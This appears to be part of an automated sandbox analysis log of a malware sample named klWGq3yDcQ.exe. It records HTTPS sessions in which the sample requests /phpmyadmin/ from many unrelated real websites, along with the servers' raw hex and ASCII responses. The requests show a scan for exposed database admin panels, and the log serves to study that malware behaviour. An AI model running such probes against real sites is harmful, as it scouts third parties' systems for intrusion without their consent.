                                                                                                                                                                                                    2023-11-26 05:59:30 UTC193OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: 2brosandahosepressurewashing.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC830INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 32 62 72 6f 73 70 77 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 78 2d 77 69 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 31 37 30 30 39 37 38 33 37 30 2e 36 35 39 31 30 33 36 33 33 35 33 36 39 31 32 38 38 32 37 0d 0a 41 67 65 3a 20 30 0d 0a 53 65 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Length: 0Connection: closelocation: https://www.2brospw.com/phpmyadminstrict-transport-security: max-age=3600x-wix-request-id: 1700978370.6591036335369128827Age: 0Ser


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    40192.168.2.45517445.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC209INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 62 61 63 6b 65 6e 64 3a 20 64 65 6e 79 5f 62 61 63 6b 65 6e 64 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Length: 0Connection: closex-backend: deny_backendStrict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    41192.168.2.453670185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC341INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 323Connection: closeLocation: http://www.grantstech.io/phpmyadmin/Cache-Control: max-age=0Expires: Sun, 26 Nov 2023 0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC323INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    42192.168.2.455230194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC119INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlycontent-length: 0location: https://www.maxiv.lu.se/phpmyadmin/connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    43192.168.2.4552923.33.130.1904436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gmailvz.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 35 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 61 61 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:35:06 GMTConnection: closeETag: "6552b2aa-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    44192.168.2.45526999.81.150.604436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC348INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 61 72 61 73 64 75 62 65 72 72 79 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecache-control: no-cache, no-store, must-revalidatelocation: https://www.harasduberry.com/phpmyadm
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    45192.168.2.455326162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC183OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC281INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 56 61 72 79 3a 20 61 63 63 65 70 74 2d 6c 61 6e 67 75 61 67 65 2c 61 63 63 65 70 74 2d 63 68 61 72 73 65 74 2c 55 73 65 72 2d 41 67 65 6e 74 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentUpgrade: h2Connection: Upgrade, closeAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1098INData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f
                                                                                                                                                                                                    Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38O


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    46192.168.2.455288162.144.64.2334436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: tcetmumbai.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC166INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: ApacheAccept-Ranges: bytesContent-Length: 764Connection: closeContent-Type: text/html
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC764INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 68 31 7b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 70 78 3b 0d 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 38 30 30 3b 0d 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 7d 0d 0a 68 32 0d 0a 7b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Error</title><link href="https://fonts.googleapis.com/css?family=Roboto:700" rel="stylesheet"><style>h1{font-size:80px;font-weight:800;text-align:center;font-family: 'Roboto', sans-serif;}h2{font-size:25px;


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    47192.168.2.45523972.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC648INData Raw: 32 37 63 0d 0a 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 27c/phpmyadmin/OOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    48192.168.2.45518115.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: quipuapp.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC247INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 67 65 74 71 75 69 70 75 2e 63 6f 6d 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://getquipu.comStrict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    49192.168.2.455123120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC245OUTGET /login/?page=%2Fphpmyadmin%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=unid3p469s9hj2a6pka8sch23r
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
